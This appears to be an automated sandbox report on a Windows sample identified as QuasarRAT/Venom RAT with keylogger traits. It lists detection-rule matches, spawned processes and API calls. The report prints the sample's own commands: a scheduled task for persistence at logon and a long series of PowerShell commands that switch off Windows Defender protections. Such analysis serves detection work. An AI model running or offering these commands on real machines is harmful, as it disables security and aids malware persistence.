      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeCode function: 0_2_00A6F0A00_2_00A6F0A0
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeCode function: 0_2_00A6F9700_2_00A6F970
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeCode function: 0_2_00A6ED580_2_00A6ED58
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeCode function: 3_2_0278F0A03_2_0278F0A0
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeCode function: 3_2_0278F9703_2_0278F970
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeCode function: 3_2_0278AC2F3_2_0278AC2F
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeCode function: 3_2_0278ED583_2_0278ED58
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeCode function: 6_2_00B9F0A06_2_00B9F0A0
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeCode function: 6_2_00B9F9706_2_00B9F970
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeCode function: 6_2_00B9ED586_2_00B9ED58
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameChrome.exe. vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInstall.exe4 vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exe, 00000000.00000000.243093711.00000000000C8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename$77-Venom.exe" vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exe, 00000006.00000002.566986979.0000000000C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exeBinary or memory string: OriginalFilenameChrome.exe. vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exeBinary or memory string: OriginalFilenameInstall.exe4 vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exeBinary or memory string: OriginalFilename$77-Venom.exe" vs JeCXrQSehB.exe
      Source: JeCXrQSehB.exeReversingLabs: Detection: 96%
      Source: JeCXrQSehB.exeVirustotal: Detection: 69%
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile read: C:\Users\user\Desktop\JeCXrQSehB.exeJump to behavior
      Source: JeCXrQSehB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\JeCXrQSehB.exe C:\Users\user\Desktop\JeCXrQSehB.exe
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\JeCXrQSehB.exe" /rl HIGHEST /f
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Users\user\AppData\Roaming\UPX\Client.exe C:\Users\user\AppData\Roaming\UPX\Client.exe
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\Desktop\JeCXrQSehB.exe C:\Users\user\Desktop\JeCXrQSehB.exe
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\UPX\Client.exe" /rl HIGHEST /f
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\JeCXrQSehB.exe" /rl HIGHEST /fJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Users\user\AppData\Roaming\UPX\Client.exe C:\Users\user\AppData\Roaming\UPX\Client.exeJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verboseJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -ForceJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $trueJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\UPX\Client.exe" /rl HIGHEST /fJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile created: C:\Users\user\AppData\Roaming\UPXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl0ogsop.w33.ps1Jump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@52/32@30/2
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: Client.exe.0.dr, ??ua82f?????uecf4?????ueb16??R??.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, u2a93?ufffd?????????u2fb6ue4fe??????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, u2a93?ufffd?????????u2fb6ue4fe??????.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
      Source: Client.exe.0.dr, u2a93?ufffd?????????u2fb6ue4fe??????.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
      Source: JeCXrQSehB.exe, u2a93?ufffd?????????u2fb6ue4fe??????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: JeCXrQSehB.exe, u2a93?ufffd?????????u2fb6ue4fe??????.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
      Source: JeCXrQSehB.exe, u2a93?ufffd?????????u2fb6ue4fe??????.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
      Source: JeCXrQSehB.exe, ????ue113???????uf6bb?????u2034?.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: JeCXrQSehB.exe, ????ue113???????uf6bb?????u2034?.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: Client.exe.0.dr, ??ue7c7u0ad4??????????????u1cc3u29c4.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, ??ue7c7u0ad4??????????????u1cc3u29c4.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: Client.exe.0.dr, ????ue113???????uf6bb?????u2034?.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, ????ue113???????uf6bb?????u2034?.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: JeCXrQSehB.exe, ??ue7c7u0ad4??????????????u1cc3u29c4.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: JeCXrQSehB.exe, ??ue7c7u0ad4??????????????u1cc3u29c4.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: Client.exe.0.dr, ????u08ad????uf6e1ua7b7???????u2330?.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, ????u08ad????uf6e1ua7b7???????u2330?.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: JeCXrQSehB.exe, ????u08ad????uf6e1ua7b7???????u2330?.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: JeCXrQSehB.exe, ????u08ad????uf6e1ua7b7???????u2330?.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: JeCXrQSehB.exe, ??u25ef???uaba0???ue6ae???ue05f????uf00c.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: JeCXrQSehB.exe, ??u25ef???uaba0???ue6ae???ue05f????uf00c.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
      Source: JeCXrQSehB.exe, ??u25ef???uaba0???ue6ae???ue05f????uf00c.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
      Source: JeCXrQSehB.exe, ??ua82f?????uecf4?????ueb16??R??.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, ??u25ef???uaba0???ue6ae???ue05f????uf00c.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client.exe.0.dr, ??u25ef???uaba0???ue6ae???ue05f????uf00c.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
      Source: Client.exe.0.dr, ??u25ef???uaba0???ue6ae???ue05f????uf00c.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
      Source: JeCXrQSehB.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: JeCXrQSehB.exe, ????????????ueddc??u29b1????.csBase64 encoded string: 'r8jV079KjVO5T56/bjEiRsdKFaiOiRR++TaFND1nooaBgt19FJAmmtfndtf7oryBmFskc3Xz86vmuDe3VLBJ2w==', '/H224nJHgCCYue2rM9Wf/Cc0Pvhn1ITcGp2WQVKBoAo6y2TyQ0UgMDwcLOuTo2ShG0AHeLMrUZ09g1fqNEet4wFMnhXBE2YElQskTP6SK54=', 'NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==', 'ishpPg/P1PiK6pY4uLX8/rx4fpjyHqHMxNO+zCckESSHqyAVVBpXQd70vgKBhptbVjz86iO1ndXpuKRflL9Epw==', '+dLdad/XZDubvZ/ZmAMpKsT8eS4JOuCnCVKvOVLeclmj2ymjOVP5y5db5vnG8Tjq63YZSBhitYL1sZhlckLXEQ=='
      Source: Client.exe.0.dr, ????????????ueddc??u29b1????.csBase64 encoded string: 'r8jV079KjVO5T56/bjEiRsdKFaiOiRR++TaFND1nooaBgt19FJAmmtfndtf7oryBmFskc3Xz86vmuDe3VLBJ2w==', '/H224nJHgCCYue2rM9Wf/Cc0Pvhn1ITcGp2WQVKBoAo6y2TyQ0UgMDwcLOuTo2ShG0AHeLMrUZ09g1fqNEet4wFMnhXBE2YElQskTP6SK54=', 'NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg==', 'ishpPg/P1PiK6pY4uLX8/rx4fpjyHqHMxNO+zCckESSHqyAVVBpXQd70vgKBhptbVjz86iO1ndXpuKRflL9Epw==', '+dLdad/XZDubvZ/ZmAMpKsT8eS4JOuCnCVKvOVLeclmj2ymjOVP5y5db5vnG8Tjq63YZSBhitYL1sZhlckLXEQ=='
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1540:120:WilError_01
